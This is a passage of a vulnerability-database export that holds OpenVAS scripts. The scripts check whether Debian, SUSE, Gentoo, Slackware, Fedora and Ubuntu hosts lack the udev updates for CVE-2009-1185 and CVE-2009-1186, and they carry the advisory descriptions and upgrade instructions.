isdpkgvuln(pkg:\"udev\", ver:\"0.125-7+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"0.125-7+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:54", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:020.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:020 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:63845", "href": "http://plugins.openvas.org/nasl.php?oid=63845", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_020.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:020 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer of SUSE Security identified a problem in udevd with\nhandling of netlink messages.\n\nLocal attackers could inject netlink messages due to a missing origin\ncheck where only the kernel should have been able to and so are able\nto escalate privileges. (CVE-2009-1185)\n\nFixed packages have been released to address this issue for openSUSE\n10.3-11.1, SUSE Linux Enterprise 10 SP2 and SUSE Linux Enterprise 11.\n\nSUSE Linux Enterprise Server 9 and Novell Linux Desktop 9 are not\naffected by this problem.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:020\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:020.\";\n\n \n\nif(description)\n{\n script_id(63845);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:020 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libudev-devel\", rpm:\"libudev-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~126~17.38.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:00", "description": "The remote host is missing updates announced in\nadvisory GLSA 200904-18.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200904-18 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:63854", "href": "http://plugins.openvas.org/nasl.php?oid=63854", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two errors in udev allow for a local root compromise and a Denial of\n Service.\";\ntag_solution = \"All udev users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-fs/udev-124-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200904-18\nhttp://bugs.gentoo.org/show_bug.cgi?id=266290\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200904-18.\";\n\n \n \n\nif(description)\n{\n script_id(63854);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200904-18 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-fs/udev\", unaffected: make_list(\"ge 124-r2\"), vulnerable: make_list(\"lt 124-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:32", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-111-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2009-111-01 udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:63895", "href": "http://plugins.openvas.org/nasl.php?oid=63895", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_111_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New udev packages are available for Slackware 10.2, 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\n\nThe udev packages in Slackware 10.2, 11.0, 12.0, 12.1, 12.2, and -current\ncontained a local root hole vulnerability: CVE-2009-1185\n\nThe udev packages in Slackware 12.0, 12.1, 12.2, and -current had an integer\noverflow which could result in a denial of service: CVE-2009-1186\n\nNote that udev is only used with 2.6 kernels, which are not used by default\nwith Slackware 10.2 and 11.0.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-111-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-111-01\";\n \nif(description)\n{\n script_id(63895);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2009-111-01 udev \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"udev\", ver:\"064-i486-4_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"udev\", ver:\"097-i486-11_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"udev\", ver:\"111-i486-6_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"udev\", ver:\"118-i486-4_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"udev\", ver:\"141-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:08", "description": "The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3712.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-3712 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:63837", "href": "http://plugins.openvas.org/nasl.php?oid=63837", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_3712.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-3712 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The udev package contains an implementation of devfs in\nuserspace using sysfs and netlink.\n\nUpdate Information:\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in order\nto provide greater hot plug functionality. Netlink is a datagram oriented\nservice, used to transfer information between kernel modules and user-space\nprocesses.\n\nIt was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root privileges\nvia a crafted Netlink message sent to udev, causing it to create a world-\nwritable block device file for an existing system block device (for example, the\nroot file system). (CVE-2009-1185)\n\nAn integer overflow flaw, potentially\nleading to heap-based buffer overflow was found in one of the utilities\nproviding functionality of the udev device information interface. An attacker\ncould use this flaw to cause a denial of service, or possibly, to execute\narbitrary code by providing a specially-crafted arguments as input to this\nutility. (CVE-2009-1186)\n\nThanks to Sebastian Krahmer of the SUSE Security Team for responsibly\nreporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\n\nChangeLog:\n\n* Thu Apr 16 2009 Harald Hoyer 124-4\n- fix for CVE-2009-1186\n* Tue Apr 14 2009 Harald Hoyer 124-3\n- fix for CVE-2009-1185\n* Wed Aug 6 2008 Harald Hoyer 124-2\n- added patch for cdrom tray close bug (rhbz#453095)\n- fixed udevadm syntax in start_udev (credits B.J.W. Polman)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update udev' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-3712\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3712.\";\n\n\n\nif(description)\n{\n script_id(63837);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-3712 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495051\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495052\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-static\", rpm:\"udev-static~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-debuginfo\", rpm:\"udev-debuginfo~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:26", "description": "The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3711.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-3711 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:63838", "href": "http://plugins.openvas.org/nasl.php?oid=63838", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_3711.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-3711 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The udev package contains an implementation of devfs in\nuserspace using sysfs and netlink.\n\nUpdate Information:\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in order\nto provide greater hot plug functionality. Netlink is a datagram oriented\nservice, used to transfer information between kernel modules and user-space\nprocesses.\n\nIt was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root privileges\nvia a crafted Netlink message sent to udev, causing it to create a world-\nwritable block device file for an existing system block device (for example, the\nroot file system). (CVE-2009-1185)\n\nAn integer overflow flaw, potentially\nleading to heap-based buffer overflow was found in one of the utilities\nproviding functionality of the udev device information interface. An attacker\ncould use this flaw to cause a denial of service, or possibly, to execute\narbitrary code by providing a specially-crafted arguments as input to this\nutility. (CVE-2009-1186)\n\nThanks to Sebastian Krahmer of the SUSE Security Team for responsibly\nreporting this flaw. Users of udev are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAfter installing the update, the udevd daemon will be restarted automatically.\n\nChangeLog:\n\n* Thu Apr 16 2009 Harald Hoyer 127-5\n- fix for CVE-2009-1186\n* Wed Apr 15 2009 Harald Hoyer 127-4\n- fix for CVE-2009-1185\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update udev' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-3711\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3711.\";\n\n\n\nif(description)\n{\n script_id(63838);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-3711 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495051\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495052\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libudev-devel\", rpm:\"libudev-devel~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-static\", rpm:\"udev-static~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-debuginfo\", rpm:\"udev-debuginfo~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:27:58", "description": "The remote host is missing an update to udev\nannounced via advisory USN-758-1.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Ubuntu USN-758-1 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:63857", "href": "http://plugins.openvas.org/nasl.php?oid=63857", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_758_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_758_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-758-1 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n udev 079-0ubuntu35.1\n\nUbuntu 7.10:\n udev 113-0ubuntu17.2\n\nUbuntu 8.04 LTS:\n udev 117-8ubuntu0.2\n\nUbuntu 8.10:\n udev 124-9ubuntu0.2\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-758-1\";\n\ntag_insight = \"Sebastian Krahmer discovered that udev did not correctly validate netlink\nmessage senders. A local attacker could send specially crafted messages\nto udev in order to gain root privileges. (CVE-2009-1185)\n\nSebastian Krahmer discovered a buffer overflow in the path encoding routines\nin udev. A local attacker could exploit this to crash udev, leading to a\ndenial of service. (CVE-2009-1186)\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory USN-758-1.\";\n\n \n\n\nif(description)\n{\n script_id(63857);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-758-1 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-758-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"079-0ubuntu35.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = 